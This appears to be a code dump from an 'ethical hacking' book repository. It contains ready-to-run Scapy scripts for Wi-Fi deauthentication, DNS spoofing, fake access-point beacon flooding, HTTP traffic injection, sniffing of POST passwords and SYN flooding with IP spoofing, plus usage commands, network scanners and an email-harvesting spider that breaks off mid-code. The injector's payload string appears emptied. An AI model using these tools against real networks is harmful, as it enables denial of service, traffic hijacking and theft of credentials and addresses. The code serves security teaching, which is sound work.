| [2022-04-05 - 09:42:07] : d8:12:65:be:88:af - DESKTOP-PSU2DCJ / MSFT 5.0 requested 192.168.43.124 2 | [2022-04-05 - 09:42:24] : 1c:b7:96:ab:ec:f0 - HUAWEI_P30-9e8b07efe8a355 / HUAWEI:android:ELE requested 192.168.43.4 3 | [2022-04-05 - 09:58:29] : 48:13:7e:fe:a5:e3 - android-a5c29949fa129cde / dhcpcd-5.5.6 requested 192.168.43.66 -------------------------------------------------------------------------------- /chapter-5/dhcp-listener/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/disconnect-devices/network_kicker.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | 4 | def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1): 5 | # 802.11 frame 6 | # addr1: destination MAC 7 | # addr2: source MAC 8 | # addr3: Access Point MAC 9 | dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac) 10 | # stack them up 11 | packet = RadioTap()/dot11/Dot11Deauth(reason=7) 12 | # send the packet 13 | sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose) 14 | 15 | 16 | if __name__ == "__main__": 17 | import argparse 18 | parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames") 19 | parser.add_argument("target", help="Target MAC address to deauthenticate.") 20 | parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with") 21 | parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0) 22 | parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1) 23 | parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon") 24 | parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true") 25 | # parse the arguments 26 | args = parser.parse_args() 27 | target = args.target 28 | gateway = args.gateway 29 | count = int(args.count) 30 | interval = float(args.interval) 31 | iface = args.iface 32 | verbose = args.verbose 33 | 34 | if count == 0: 35 | # if count is 0, it means we loop forever (until interrupt) 36 | loop = 1 37 | count = None 38 | else: 39 | loop = 0 40 | 41 | # printing some info messages" 42 | if verbose: 43 | if count: 44 | print(f"[+] Sending {count} frames every {interval}s...") 45 | else: 46 | print(f"[+] Sending frames every {interval}s for ever...") 47 | 48 | # send the deauthentication frames 49 | deauth(target, gateway, interval, count, loop, iface, verbose) 50 | 51 | -------------------------------------------------------------------------------- /chapter-5/disconnect-devices/output.md: -------------------------------------------------------------------------------- 1 | sudo ifconfig wlan0 down 2 | sudo iwconfig wlan0 mode monitor 3 | 4 | sudo airmon-ng start wlan0 5 | 6 | airodump-ng wlan0mon 7 | 8 | python scapy_deauth.py ea:de:ad:be:ef:ff 68:ff:7b:b7:83:be -i wlan0mon -v -c 100 --interval 0.1 9 | 10 | airmon-ng stop wlan0mon -------------------------------------------------------------------------------- /chapter-5/disconnect-devices/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/dns-spoof/dns_spoofer.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from netfilterqueue import NetfilterQueue 3 | import os 4 | from colorama import Fore, init 5 | 6 | # define some colors 7 | GREEN = Fore.GREEN 8 | RESET = Fore.RESET 9 | 10 | # init the colorama module 11 | init() 12 | 13 | # DNS mapping records, feel free to add/modify this dictionary 14 | # for example, google.com will be redirected to 192.168.1.117 15 | dns_hosts = { 16 | "google.com": "192.168.1.117", 17 | "stackoverflow.com": "35.169.197.241", 18 | } 19 | 20 | # a function to check whether two domains are the same regardless of www. 21 | def is_same_domain(domain1, domain2): 22 | """Checks whether two domains are the same regardless of www. 23 | For instance, `www.google.com` and `google.com` are the same domain.""" 24 | # remove the www. if exists 25 | domain1 = domain1.replace("www.", "") 26 | domain2 = domain2.replace("www.", "") 27 | # return the result 28 | return domain1 == domain2 29 | 30 | 31 | # a function to get the modified IP of domains in dns_hosts dictionary 32 | def get_modified_ip(qname, dns_hosts=dns_hosts): 33 | """Checks whether `domain` is in `dns_hosts` dictionary. 34 | If it is, returns the modified IP address, otherwise returns None.""" 35 | for domain in dns_hosts: 36 | if is_same_domain(qname, domain): 37 | # if the domain is in our record 38 | # return the modified IP 39 | return dns_hosts[domain] 40 | 41 | 42 | def process_packet(packet): 43 | """Whenever a new packet is redirected to the netfilter queue, 44 | this callback is called.""" 45 | # convert netfilter queue packet to scapy packet 46 | scapy_packet = IP(packet.get_payload()) 47 | if scapy_packet.haslayer(DNSRR): 48 | # if the packet is a DNS Resource Record (DNS reply) 49 | # modify the packet 50 | # print("[Before]:", scapy_packet.summary()) 51 | try: 52 | scapy_packet = modify_packet(scapy_packet) 53 | except IndexError: 54 | # not UDP packet, this can be IPerror/UDPerror packets 55 | pass 56 | # print("[After ]:", scapy_packet.summary()) 57 | # set back as netfilter queue packet 58 | packet.set_payload(bytes(scapy_packet)) 59 | # accept the packet 60 | packet.accept() 61 | 62 | 63 | def modify_packet(packet): 64 | """Modifies the DNS Resource Record `packet` (the answer part) 65 | to map our globally defined `dns_hosts` dictionary. 66 | For instance, whenever we see a google.com answer, this function replaces 67 | the real IP address (172.217.19.142) with fake IP address (192.168.1.117)""" 68 | # get the DNS question name, the domain name 69 | qname = packet[DNSQR].qname 70 | # decode the domain name to string and remove the trailing dot 71 | qname = qname.decode().strip(".") 72 | # get the modified IP if it exists 73 | modified_ip = get_modified_ip(qname) 74 | if not modified_ip: 75 | # if the website isn't in our record 76 | # we don't wanna modify that 77 | print("no modification:", qname) 78 | return packet 79 | # print the original IP address 80 | print(f"{GREEN}[+] Domain: {qname}{RESET}") 81 | print(f"{GREEN}[+] Original IP: {packet[DNSRR].rdata}{RESET}") 82 | print(f"{GREEN}[+] Modifed (New) IP: {modified_ip}{RESET}") 83 | # craft new answer, overriding the original 84 | # setting the rdata for the IP we want to redirect (spoofed) 85 | # for instance, google.com will be mapped to "192.168.1.100" 86 | packet[DNS].an = DNSRR(rrname=packet[DNSQR].qname, rdata=modified_ip) 87 | # set the answer count to 1 88 | packet[DNS].ancount = 1 89 | # delete checksums and length of packet, because we have modified the packet 90 | # new calculations are required (scapy will do automatically) 91 | del packet[IP].len 92 | del packet[IP].chksum 93 | del packet[UDP].len 94 | del packet[UDP].chksum 95 | # return the modified packet 96 | return packet 97 | 98 | 99 | if __name__ == "__main__": 100 | QUEUE_NUM = 0 101 | # insert the iptables FORWARD rule 102 | os.system(f"iptables -I FORWARD -j NFQUEUE --queue-num {QUEUE_NUM}") 103 | # instantiate the netfilter queue 104 | queue = NetfilterQueue() 105 | try: 106 | # bind the queue number to our callback `process_packet` 107 | # and start it 108 | queue.bind(QUEUE_NUM, process_packet) 109 | queue.run() 110 | except KeyboardInterrupt: 111 | # if want to exit, make sure we 112 | # remove that rule we just inserted, going back to normal. 113 | os.system("iptables --flush") 114 | -------------------------------------------------------------------------------- /chapter-5/dns-spoof/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | netfilterqueue 3 | colorama -------------------------------------------------------------------------------- /chapter-5/fake-access-points/fake_access_points_forger.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from threading import Thread 3 | from faker import Faker 4 | 5 | 6 | def send_beacon(ssid, mac, infinite=True): 7 | dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac) 8 | # type=0: management frame 9 | # subtype=8: beacon frame 10 | # addr1: MAC address of the receiver 11 | # addr2: MAC address of the sender 12 | # addr3: MAC address of the Access Point (AP) 13 | 14 | # beacon frame 15 | beacon = Dot11Beacon() 16 | # we inject the ssid name 17 | essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) 18 | # stack all the layers and add a RadioTap 19 | frame = RadioTap()/dot11/beacon/essid 20 | # send the frame 21 | if infinite: 22 | sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0) 23 | else: 24 | sendp(frame, iface=iface, verbose=0) 25 | 26 | 27 | if __name__ == "__main__": 28 | import argparse 29 | parser = argparse.ArgumentParser(description="Fake Access Point Generator") 30 | parser.add_argument("interface", default="wlan0mon", help="The interface to send beacon frames with, must be in monitor mode") 31 | parser.add_argument("-n", "--access-points", type=int, dest="n_ap", help="Number of access points to be generated") 32 | args = parser.parse_args() 33 | n_ap = args.n_ap 34 | iface = args.interface 35 | # generate random SSIDs and MACs 36 | faker = Faker() 37 | # generate a list of random SSIDs along with their random MACs 38 | ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(n_ap) ] 39 | for ssid, mac in ssids_macs: 40 | # spawn a thread for each access point that will send beacon frames 41 | Thread(target=send_beacon, args=(ssid, mac)).start() 42 | -------------------------------------------------------------------------------- /chapter-5/fake-access-points/output.md: -------------------------------------------------------------------------------- 1 | $ apt-get install aircrack-ng 2 | 3 | root@rockikz:~# airmon-ng start wlan0 4 | 5 | PHY Interface Driver Chipset 6 | 7 | phy0 wlan0 ath9k_htc Atheros Communications, Inc. TP-Link TL-WN821N v3 / TL-WN822N v2 802.11n [Atheros AR7010+AR9287] 8 | 9 | (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 10 | (mac80211 station mode vif disabled for [phy0]wlan0) 11 | 12 | 13 | $ pip3 install faker scapy 14 | 15 | python fake_access_points_forger.py wlan0mon -n 5 -------------------------------------------------------------------------------- /chapter-5/fake-access-points/simple_fake_access_point_forger.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | # interface to use to send beacon frames, must be in monitor mode 4 | iface = "wlan0mon" 5 | # generate a random MAC address (built-in in scapy) 6 | sender_mac = RandMAC() 7 | # SSID (name of access point) 8 | ssid = "Test" 9 | # 802.11 frame 10 | dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac) 11 | # beacon layer 12 | beacon = Dot11Beacon() 13 | # putting ssid in the frame 14 | essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) 15 | # stack all the layers and add a RadioTap 16 | frame = RadioTap()/dot11/beacon/essid 17 | # send the frame in layer 2 every 100 milliseconds forever 18 | # using the `iface` interface 19 | sendp(frame, inter=0.1, iface=iface, loop=1) -------------------------------------------------------------------------------- /chapter-5/inject-code-onto-http/code_injector.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from colorama import init, Fore 3 | import netfilterqueue 4 | import re 5 | 6 | # initialize colorama 7 | init() 8 | # define colors 9 | GREEN = Fore.GREEN 10 | RESET = Fore.RESET 11 | 12 | 13 | def process_packet(packet): 14 | """This function is executed whenever a packet is sniffed""" 15 | # convert the netfilterqueue packet into Scapy packet 16 | spacket = IP(packet.get_payload()) 17 | if spacket.haslayer(Raw) and spacket.haslayer(TCP): 18 | if spacket[TCP].dport == 80: 19 | # HTTP request 20 | print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}") 21 | try: 22 | load = spacket[Raw].load.decode() 23 | except Exception as e: 24 | # raw data cannot be decoded, apparently not HTML 25 | # forward the packet exit the function 26 | packet.accept() 27 | return 28 | # remove Accept-Encoding header from the HTTP request 29 | new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load) 30 | # set the new data 31 | spacket[Raw].load = new_load 32 | # set IP length header, checksums of IP and TCP to None 33 | # so Scapy will re-calculate them automatically 34 | spacket[IP].len = None 35 | spacket[IP].chksum = None 36 | spacket[TCP].chksum = None 37 | # set the modified Scapy packet back to the netfilterqueue packet 38 | packet.set_payload(bytes(spacket)) 39 | if spacket[TCP].sport == 80: 40 | # HTTP response 41 | print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}") 42 | try: 43 | load = spacket[Raw].load.decode() 44 | except Exception as e: 45 | print(e) 46 | packet.accept() 47 | return 48 | # if you want to debug and see the HTML data 49 | # print("Load:", load) 50 | # Javascript code to add, feel free to add any Javascript code 51 | added_text = "" 52 | # or you can add HTML as well! 53 | # added_text = "

HTML Injected successfully!

" 54 | # calculate the length in bytes, each character corresponds to a byte 55 | added_text_length = len(added_text) 56 | # replace the tag with the added text plus 57 | load = load.replace("", added_text + "") 58 | if "Content-Length" in load: 59 | # if Content-Length header is available 60 | # get the old Content-Length value 61 | content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1)) 62 | # re-calculate the content length by adding the length of the injected code 63 | new_content_length = content_length + added_text_length 64 | # replace the new content length to the header 65 | load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load) 66 | # print a message if injected 67 | if added_text in load: 68 | print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}") 69 | # if you want to debug and see the modified HTML data 70 | # print("Load:", load) 71 | # set the new data 72 | spacket[Raw].load = load 73 | # set IP length header, checksums of IP and TCP to None 74 | # so Scapy will re-calculate them automatically 75 | spacket[IP].len = None 76 | spacket[IP].chksum = None 77 | spacket[TCP].chksum = None 78 | # set the modified Scapy packet back to the netfilterqueue packet 79 | packet.set_payload(bytes(spacket)) 80 | # accept all the packets 81 | packet.accept() 82 | 83 | 84 | if __name__ == "__main__": 85 | QUEUE_NUM = 0 86 | # insert the iptables FORWARD rule 87 | os.system(f"iptables -I FORWARD -j NFQUEUE --queue-num {QUEUE_NUM}") 88 | # initialize the queue 89 | queue = netfilterqueue.NetfilterQueue() 90 | try: 91 | # bind the queue number 0 to the process_packet() function 92 | queue.bind(0, process_packet) 93 | # start the filter queue 94 | queue.run() 95 | except KeyboardInterrupt: 96 | # remove the iptables FORWARD rule 97 | os.system(f"iptables --flush") 98 | print("[-] Detected CTRL+C, exiting...") 99 | exit(0) -------------------------------------------------------------------------------- /chapter-5/inject-code-onto-http/output.md: -------------------------------------------------------------------------------- 1 | $ pip install scapy==2.4.5 netfilterqueue colorama 2 | 3 | $ python arp_spoof.py 192.168.43.112 192.168.43.1 4 | python code_injector.py -------------------------------------------------------------------------------- /chapter-5/inject-code-onto-http/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | netfilterqueue 3 | colorama -------------------------------------------------------------------------------- /chapter-5/network-scanner/output.md: -------------------------------------------------------------------------------- 1 | ``` 2 | $ python simple_network_scanner.py 3 | ``` 4 | 5 | Available devices in the network: 6 | IP MAC 7 | 192.168.1.1 68:ff:0b:b7:83:be 8 | 192.168.1.109 ea:de:ad:be:ef:ff 9 | 192.168.1.105 d8:15:6f:55:39:19 10 | 192.168.1.107 c8:96:47:07:38:a8 11 | 192.168.1.166 48:11:7e:b2:9b:4a 12 | 13 | -------------------------------------------------------------------------------- /chapter-5/network-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/network-scanner/simple_network_scanner.py: -------------------------------------------------------------------------------- 1 | from scapy.all import ARP, Ether, srp 2 | 3 | target_ip = "192.168.1.1/24" 4 | # IP Address for the destination 5 | # create ARP packet 6 | arp = ARP(pdst=target_ip) 7 | # create the Ether broadcast packet 8 | # ff:ff:ff:ff:ff:ff MAC address indicates broadcasting 9 | ether = Ether(dst="ff:ff:ff:ff:ff:ff") 10 | # stack them 11 | packet = ether/arp 12 | 13 | # srp() function sends and receives packets at layer 2 14 | result = srp(packet, timeout=3, verbose=0)[0] 15 | 16 | # a list of clients, we will fill this in the upcoming loop 17 | clients = [] 18 | 19 | for sent, received in result: 20 | # for each response, append ip and mac address to `clients` list 21 | clients.append({'ip': received.psrc, 'mac': received.hwsrc}) 22 | 23 | # print clients 24 | print("Available devices in the network:") 25 | print("IP" + " "*18+"MAC") 26 | for client in clients: 27 | print("{:16} {}".format(client['ip'], client['mac'])) -------------------------------------------------------------------------------- /chapter-5/sniff-http-packets/output.md: -------------------------------------------------------------------------------- 1 | pip install colorama 2 | 3 | root@rockikz:~/pythonscripts# python3 http_sniffer.py -i wlan0 --show-raw 4 | 5 | [+] 192.168.1.100 Requested google.com/ with GET 6 | [+] 192.168.1.100 Requested www.google.com/ with GET 7 | [+] 192.168.1.100 Requested www.thepythoncode.com/ with GET 8 | [+] 192.168.1.100 Requested www.thepythoncode.com/contact with GET 9 | 10 | -------------------------------------------------------------------------------- /chapter-5/sniff-http-packets/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | colorama -------------------------------------------------------------------------------- /chapter-5/sniff-http-packets/sniff_http.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from scapy.layers.http import HTTPRequest # import HTTP packet 3 | from colorama import init, Fore 4 | 5 | # initialize colorama 6 | init() 7 | # define colors 8 | GREEN = Fore.GREEN 9 | RED = Fore.RED 10 | RESET = Fore.RESET 11 | 12 | 13 | def sniff_packets(iface=None): 14 | """Sniff 80 port packets with `iface`, if None (default), then the 15 | scapy's default interface is used""" 16 | if iface: 17 | # port 80 for http (generally) 18 | # `process_packet` is the callback 19 | sniff(filter="port 80", prn=process_packet, iface=iface, store=False) 20 | else: 21 | # sniff with default interface 22 | sniff(filter="port 80", prn=process_packet, store=False) 23 | 24 | 25 | def process_packet(packet): 26 | """This function is executed whenever a packet is sniffed""" 27 | if packet.haslayer(HTTPRequest): 28 | # if this packet is an HTTP Request 29 | # get the requested URL 30 | url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode() 31 | # get the requester's IP Address 32 | ip = packet[IP].src 33 | # get the request method 34 | method = packet[HTTPRequest].Method.decode() 35 | print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}") 36 | if show_raw and packet.haslayer(Raw) and method == "POST": 37 | # if show_raw flag is enabled, has raw data, and the requested method is "POST" 38 | # then show raw 39 | print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}") 40 | 41 | 42 | if __name__ == "__main__": 43 | import argparse 44 | parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \ 45 | + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your local browsing packets") 46 | parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface") 47 | parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.") 48 | # parse arguments 49 | args = parser.parse_args() 50 | iface = args.iface 51 | show_raw = args.show_raw 52 | # start sniffing 53 | sniff_packets(iface) -------------------------------------------------------------------------------- /chapter-5/syn-flood/output.md: -------------------------------------------------------------------------------- 1 | python syn_flood.py 192.168.1.1 -p 80 -------------------------------------------------------------------------------- /chapter-5/syn-flood/requirements.txt: -------------------------------------------------------------------------------- 1 | scapy -------------------------------------------------------------------------------- /chapter-5/syn-flood/syn_flood.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import argparse 3 | 4 | # create an ArgumentParser object 5 | parser = argparse.ArgumentParser(description="Simple SYN Flood Script") 6 | parser.add_argument("target_ip", help="Target IP address (e.g router's IP)") 7 | parser.add_argument("-p", "--port", type=int, help="Destination port (the port of the target's machine service, \ 8 | e.g 80 for HTTP, 22 for SSH and so on).") 9 | # parse arguments from the command line 10 | args = parser.parse_args() 11 | # target IP address (should be a testing router/firewall) 12 | target_ip = args.target_ip 13 | # the target port u want to flood 14 | target_port = args.port 15 | # forge IP packet with target ip as the destination IP address 16 | ip = IP(dst=target_ip) 17 | # or if you want to perform IP Spoofing (will work as well) 18 | # ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip) 19 | # forge a TCP SYN packet with a random source port 20 | # and the target port as the destination port 21 | tcp = TCP(sport=RandShort(), dport=target_port, flags="S") 22 | # add some flooding data (1KB in this case, don't increase it too much, 23 | # otherwise, it won't work.) 24 | raw = Raw(b"X"*1024) 25 | # stack up the layers 26 | p = ip / tcp / raw 27 | # send the constructed packet in a loop until CTRL+C is detected 28 | send(p, loop=1, verbose=0) -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/output.md: -------------------------------------------------------------------------------- 1 | pip3 install pandas scapy 2 | 3 | sudo ifconfig wlan0 down 4 | sudo iwconfig wlan0 mode monitor 5 | 6 | iwconfig wlan0mon channel 2 7 | 8 | python wifi_scanner.py wlan0mon -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | pandas 2 | scapy -------------------------------------------------------------------------------- /chapter-5/wifi-scanner/wifi_scanner.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from threading import Thread 3 | import pandas 4 | import time 5 | import os 6 | import sys 7 | 8 | 9 | # initialize the networks dataframe that will contain all access points nearby 10 | networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"]) 11 | # set the index BSSID (MAC address of the AP) 12 | networks.set_index("BSSID", inplace=True) 13 | 14 | def callback(packet): 15 | if packet.haslayer(Dot11Beacon): 16 | # extract the MAC address of the network 17 | bssid = packet[Dot11].addr2 18 | # get the name of it 19 | ssid = packet[Dot11Elt].info.decode() 20 | try: 21 | dbm_signal = packet.dBm_AntSignal 22 | except: 23 | dbm_signal = "N/A" 24 | # extract network stats 25 | stats = packet[Dot11Beacon].network_stats() 26 | # get the channel of the AP 27 | channel = stats.get("channel") 28 | # get the crypto 29 | crypto = stats.get("crypto") 30 | # add the network to our dataframe 31 | networks.loc[bssid] = (ssid, dbm_signal, channel, crypto) 32 | 33 | 34 | def print_all(): 35 | # print all the networks and clear the console every 0.5s 36 | while True: 37 | os.system("clear") 38 | print(networks) 39 | time.sleep(0.5) 40 | 41 | 42 | def change_channel(): 43 | ch = 1 44 | while True: 45 | # change the channel of the interface 46 | os.system(f"iwconfig {interface} channel {ch}") 47 | # switch channel from 1 to 14 each 0.5s 48 | ch = ch % 14 + 1 49 | time.sleep(0.5) 50 | 51 | 52 | if __name__ == "__main__": 53 | # interface name, check using iwconfig 54 | interface = sys.argv[1] 55 | # start the thread that prints all the networks 56 | printer = Thread(target=print_all) 57 | printer.daemon = True 58 | printer.start() 59 | # start the channel changer 60 | channel_changer = Thread(target=change_channel) 61 | channel_changer.daemon = True 62 | channel_changer.start() 63 | # start sniffing 64 | sniff(prn=callback, iface=interface) -------------------------------------------------------------------------------- /chapter-6/email-spider/Screenshot.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-6/email-spider/Screenshot.jpg -------------------------------------------------------------------------------- /chapter-6/email-spider/advanced_email_spider.py: -------------------------------------------------------------------------------- 1 | import re 2 | import argparse 3 | import threading 4 | from urllib.parse import urlparse, urljoin 5 | from queue import Queue 6 | import time 7 | import warnings 8 | warnings.filterwarnings("ignore") 9 | 10 | import requests 11 | from bs4 import BeautifulSoup 12 | import colorama 13 | 14 | # init the colorama module 15 | colorama.init() 16 | 17 | # initialize some colors 18 | GREEN = colorama.Fore.GREEN 19 | GRAY = colorama.Fore.LIGHTBLACK_EX 20 | RESET = colorama.Fore.RESET 21 | YELLOW = colorama.Fore.YELLOW 22 | RED = colorama.Fore.RED 23 | 24 | EMAIL_REGEX = r"""(?:[a-z0-9!#$%&'*+=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f]){2,12})\])""" 25 | # EMAIL_REGEX = r"[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]{2,12})*" 26 | 27 | # forbidden TLDs, feel free to add more extensions here to prevent them identified as TLDs 28 | FORBIDDEN_TLDS = [ 29 | "js", "css", "jpg", "png", "svg", "webp", "gz", "zip", "webm", "mp3", 30 | "wav", "mp4", "gif", "tar", "gz", "rar", "gzip", "tgz", 31 | ] 32 | # a list of forbidden extensions in URLs, i.e 'gif' URLs won't be requested 33 | FORBIDDEN_EXTENSIONS = [ 34 | "js", "css", "jpg", "png", "svg", "webp", "gz", "zip", "webm", "mp3", 35 | "wav", "mp4", "gif", "tar", "gz", "rar", "gzip", "tgz", 36 | ] 37 | 38 | # locks to assure mutex, one for output console & another for a file 39 | print_lock = threading.Lock() 40 | file_lock = threading.Lock() 41 | 42 | def is_valid_email_address(email): 43 | """Verify whether `email` is a valid email address 44 | Args: 45 | email (str): The target email address. 46 | Returns: bool""" 47 | for forbidden_tld in FORBIDDEN_TLDS: 48 | if email.endswith(forbidden_tld): 49 | # if the email ends with one of the forbidden TLDs, return False 50 | return False 51 | if re.search(r"\..{1}$", email): 52 | # if the TLD has a length of 1, definitely not an email 53 | return False 54 | elif re.search(r"\..*\d+.*$", email): 55 | # TLD contain numbers, not an email either 56 | return False 57 | # return true otherwise 58 | return True 59 | 60 | 61 | def is_valid_url(url): 62 | """ 63 | Checks whether `url` is a valid URL. 64 | """ 65 | parsed = urlparse(url) 66 | return bool(parsed.netloc) and bool(parsed.scheme) 67 | 68 | 69 | def is_text_url(url): 70 | """Returns False if the URL is one of the forbidden extensions. 71 | True otherwise""" 72 | for extension in FORBIDDEN_EXTENSIONS: 73 | if url.endswith(extension): 74 | return False 75 | return True 76 | 77 | 78 | class Crawler(threading.Thread): 79 | def __init__(self, first_url, delay, crawl_external_urls=False, max_crawl_urls=30): 80 | # Call the Thread class's init function 81 | super().__init__() 82 | self.first_url = first_url 83 | self.delay = delay 84 | # whether to crawl external urls than the domain specified in the first url 85 | self.crawl_external_urls = crawl_external_urls 86 | self.max_crawl_urls = max_crawl_urls 87 | # a dictionary that stores visited urls along with their HTML content 88 | self.visited_urls = {} 89 | # domain name of the base URL without the protocol 90 | self.domain_name = urlparse(self.first_url).netloc 91 | # simple debug message to see whether domain is extracted successfully 92 | # print("Domain name:", self.domain_name) 93 | # initialize the set of links (unique links) 94 | self.internal_urls = set() 95 | self.external_urls = set() 96 | # initialize the queue that will be read by the email spider 97 | self.urls_queue = Queue() 98 | # add the first URL to the queue 99 | self.urls_queue.put(self.first_url) 100 | # a counter indicating the total number of URLs visited 101 | # used to stop crawling when reaching `self.max_crawl_urls` 102 | self.total_urls_visited = 0 103 | 104 | def get_all_website_links(self, url): 105 | """ 106 | Returns all URLs that is found on `url` in which it belongs to the same website 107 | """ 108 | # all URLs of `url` 109 | urls = set() 110 | # make the HTTP request 111 | res = requests.get(url, verify=False, timeout=10) 112 | # construct the soup to parse HTML 113 | soup = BeautifulSoup(res.text, "html.parser") 114 | # store the visited URL along with the HTML 115 | self.visited_urls[url] = res.text 116 | for a_tag in soup.findAll("a"): 117 | href = a_tag.attrs.get("href") 118 | if href == "" or href is None: 119 | # href empty tag 120 | continue 121 | # join the URL if it's relative (not absolute link) 122 | href = urljoin(url, href) 123 | parsed_href = urlparse(href) 124 | # remove URL GET parameters, URL fragments, etc. 125 | href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path 126 | if not is_valid_url(href): 127 | # not a valid URL 128 | continue 129 | if href in self.internal_urls: 130 | # already in the set 131 | continue 132 | if self.domain_name not in href: 133 | # external link 134 | if href not in self.external_urls: 135 | # debug message to see external links when they're found 136 | # print(f"{GRAY}[!] External link: {href}{RESET}") 137 | # external link, add to external URLs set 138 | self.external_urls.add(href) 139 | if self.crawl_external_urls: 140 | # if external links are allowed to extract emails from, 141 | # put them in the queue 142 | self.urls_queue.put(href) 143 | continue 144 | # debug message to see internal links when they're found 145 | # print(f"{GREEN}[*] Internal link: {href}{RESET}") 146 | # add the new URL to urls, queue and internal URLs 147 | urls.add(href) 148 | self.urls_queue.put(href) 149 | self.internal_urls.add(href) 150 | return urls 151 | 152 | def crawl(self, url): 153 | """ 154 | Crawls a web page and extracts all links. 155 | You'll find all links in `self.external_urls` and `self.internal_urls` attributes. 156 | """ 157 | # if the URL is not a text file, i.e not HTML, PDF, text, etc. 158 | # then simply return and do not crawl, as it's unnecessary download 159 | if not is_text_url(url): 160 | return 161 | # increment the number of URLs visited 162 | self.total_urls_visited += 1 163 | with print_lock: 164 | print(f"{YELLOW}[*] Crawling: {url}{RESET}") 165 | # extract all the links from the URL 166 | links = self.get_all_website_links(url) 167 | for link in links: 168 | # crawl each link extracted if max_crawl_urls is still not reached 169 | if self.total_urls_visited > self.max_crawl_urls: 170 | break 171 | self.crawl(link) 172 | # simple delay for not overloading servers & cause it to block our IP 173 | time.sleep(self.delay) 174 | 175 | def run(self): 176 | # the running thread will start crawling the first URL passed 177 | self.crawl(self.first_url) 178 | 179 | 180 | 181 | class EmailSpider: 182 | def __init__(self, crawler: Crawler, n_threads=20, output_file="extracted-emails.txt"): 183 | self.crawler = crawler 184 | # the set that contain the extracted URLs 185 | self.extracted_emails = set() 186 | # the number of threads 187 | self.n_threads = n_threads 188 | self.output_file = output_file 189 | 190 | 191 | def get_emails_from_url(self, url): 192 | # if the url ends with an extension not in our interest, 193 | # return an empty set 194 | if not is_text_url(url): 195 | return set() 196 | # get the HTTP Response if the URL isn't visited by the crawler 197 | if url not in self.crawler.visited_urls: 198 | try: 199 | with print_lock: 200 | print(f"{YELLOW}[*] Getting Emails from {url}{RESET}") 201 | r = requests.get(url, verify=False, timeout=10) 202 | except Exception as e: 203 | with print_lock: 204 | print(e) 205 | return set() 206 | else: 207 | text = r.text 208 | else: 209 | 